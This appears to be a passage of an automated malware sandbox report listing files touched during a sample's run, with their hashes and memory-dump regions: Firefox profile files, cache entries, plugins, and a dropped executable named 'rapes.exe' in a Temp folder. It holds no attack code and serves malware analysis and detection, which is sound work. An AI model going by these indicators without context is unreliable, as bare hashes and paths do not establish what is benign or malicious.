C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\prefs.js

MD5 82f9c241e66d06b758ba9d4233903153
SHA1 812ccf2a07e539c62c81e1587b83d38ef49bf802
SHA256 aa009c5b0244e6ff24f1fd3d818b5b28da576bf957c703a9c0f499f5e29a560c
SHA512 18d217ae0312935722dab208a029965abf0fc9854bca10d590ac697fdaf6423b6fff56ecd6bce58cec1d34c98a786f0eb48eaa9a70a05ed951072e368fdc3f10

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\cache2\entries\8DF0E9F84C5909278CF68CB55A683669F40995FB

MD5 917c3e6321d9f4fd8652fca32aac6d6b
SHA1 01e0cd1bad70560b7f28aa7da8707860165820b5
SHA256 74cb9ab31073de9e121dde61f113cd4ff17eaf598e12c4c3b325769a6ac4ec91
SHA512 44870eea95ed2d64c3080a98abd8f417e8a6df208d476f0a6517318b5c28e225d22125d25bc2a9d0b95fb4f6dc5519e666f55ffa0d08d7c5189b70ec56a20104

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 0a8747a2ac9ac08ae9508f36c6d75692
SHA1 b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA256 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA512 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

MD5 bf957ad58b55f64219ab3f793e374316
SHA1 a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256 bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA512 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

MD5 daf7ef3acccab478aaa7d6dc1c60f865
SHA1 f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256 bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA512 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

memory/984-841-0x0000000000BA0000-0x0000000001062000-memory.dmp

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\cache2\entries\ADF5BD09EB688DAB1F35EE02E8C35329D0E4AD89

MD5 110bc7ae6bd1709c151f2989f7883919
SHA1 b8a082d6980bb997a64ffd6d92a8bdefd742d20a
SHA256 898016830d29947e641ba662367662a64ffc3a7996d661b606bbcc78dd232eda
SHA512 23a8f03d8bfbf33f0752a88906b2fb2ca5dec7db2bca35a30f011ce2cdc550288d2107ceb7b27e384d9f8343b700a60f595d8bcfa977564313f104f578b59d21

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\prefs-1.js

MD5 cc6fcbc0df531a05fbde0a8e727387d6
SHA1 e258517c85ab990b056dc36d49e47b285205c613
SHA256 050aff07021a039dcd31c1182228d9537ccda931d7e109bd968c543b7ed6dcf9
SHA512 feec0c0c545c66214f4a62fd34107c557d1f8f5b2a225fdbe639c06f3b318d327895d7184e90b8b58d8f34683dae5fecd3a43e64d8ed6598996e82b51a4ee859

memory/984-2914-0x0000000000BA0000-0x0000000001062000-memory.dmp

memory/984-3711-0x0000000000BA0000-0x0000000001062000-memory.dmp

memory/984-3714-0x0000000000BA0000-0x0000000001062000-memory.dmp

memory/984-3718-0x0000000000BA0000-0x0000000001062000-memory.dmp

memory/984-3720-0x0000000000BA0000-0x0000000001062000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

MD5 06f2bf604094d7a50950c63a42472d7b
SHA1 4001209cfe41b43f6b1e0940b41fada952a3883c
SHA256 7da60962ee6d1a9e1ac49c968f645d6ed74ef379c2df1144ee61d92bccd71a01
SHA512 f157e3dba866a23846c5d31fb75ddea909fd497e37663f17bf4fcc6c70ff94316fcdf98c300ffa639ae355c9de3d9e2fc7706d1cbdd22c53fe0b42db1f02e4db

memory/3420-3722-0x0000000000BA0000-0x0000000001062000-memory.dmp

memory/3420-3723-0x0000000000BA0000-0x0000000001062000-memory.dmp

memory/984-3724-0x0000000000BA0000-0x0000000001062000-memory.dmp